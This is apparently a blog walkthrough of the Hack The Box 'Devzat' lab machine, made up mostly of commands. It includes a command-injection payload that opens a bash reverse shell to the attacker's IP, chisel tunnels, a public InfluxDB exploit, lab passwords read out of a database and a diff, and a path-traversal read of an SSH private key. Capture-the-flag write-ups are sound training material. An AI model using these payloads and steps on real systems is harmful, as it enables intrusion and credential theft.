Hack_The_Box_Writeups

HackTheBox – Devzat Walkthrough – In English

┌──(rootkali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.118

http://devzat.htb/

┌──(rootkali)-[/usr/share/dirb/wordlists]

└─# wfuzz -u http://devzat.htb -H ‘Host: FUZZ.devzat.htb’ -w /opt/SecLists/Discovery/DNS/subdomains-top1million-5000.txt –hw 26

http://pets.devzat.htb/

At the bottom of the page, there was an input form to add pets.

Add this

{“name”:”test”,”species”:”cat; bash -c ‘bash -i >& /dev/tcp/10.10.14.102/1234 0>&1′”}

And we get the shell.

patrick@devzat:~/pets$ python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

┌──(rootkali)-[/home/kali/Downloads]

└─# stty raw -echo; fg

patrick@devzat:~/pets$ export TERM=xterm

patrick@devzat:~/pets$ cd /home

patrick@devzat:/home$ ls –lrt

patrick@devzat:~$ ls –lrt

patrick@devzat:~$ cd devzat

patrick@devzat:~/devzat$ ls –lrt

patrick@devzat:~/devzat$ cat devchat.go

patrick@devzat:~$ netstat –tlpn

https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933

┌──(rootkali)-[/home/kali/Downloads]

└─# ./chisel server -p 8000 –reverse

patrick@devzat:~$ ./chisel.1 client 10.10.14.102:8000 R:8086:127.0.0.1:8086

┌──(rootkali)-[/home/kali/Downloads/InfluxDB-Exploit-CVE-2019-20933]

└─# python3 __main__.py

[admin@127.0.0.1] Database: 1

[admin@127.0.0.1/devzat] $ show measurements on devzat

[admin@127.0.0.1/devzat] $ SELECT * FROM “devzat”.”myretention”.”user”

We get this

“woBeeYareedahc7Oogeephies7Aiseci”,

                            “catherine”

patrick@devzat:~/pets$ su Catherine

catherine@devzat:~$ cd /var/backups/

catherine@devzat:/var/backups$ ls –la

catherine@devzat:/var/backups$ cp devzat-main.zip devzat-dev.zip /tmp

catherine@devzat:/var/backups$ cd /tmp

catherine@devzat:/tmp$ unzip devzat-main.zip

catherine@devzat:/tmp$ unzip devzat-dev.zip

catherine@devzat:/tmp$  ls -ls dev/ main/

catherine@devzat:/tmp$ diff main/commands.go dev/commands.go

CeilingCatStillAThingIn2021?

┌──(rootkali)-[/home/kali/Downloads]

└─# ./chisel server -p 8000 –reverse

catherine@devzat:/home/patrick$ ./chisel.1 client 10.10.14.102:8000 R:8443:127.0.0.1:8443

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh -l kavi -p 8443 127.0.0.1

kavi: /file

kavi: /file test CeilingCatStillAThingIn2021?

kavi: /file ../.ssh/id_rsa CeilingCatStillAThingIn2021?

Hi, I’m saksham dixit

Leave a Reply

Your email address will not be published. Required fields are marked *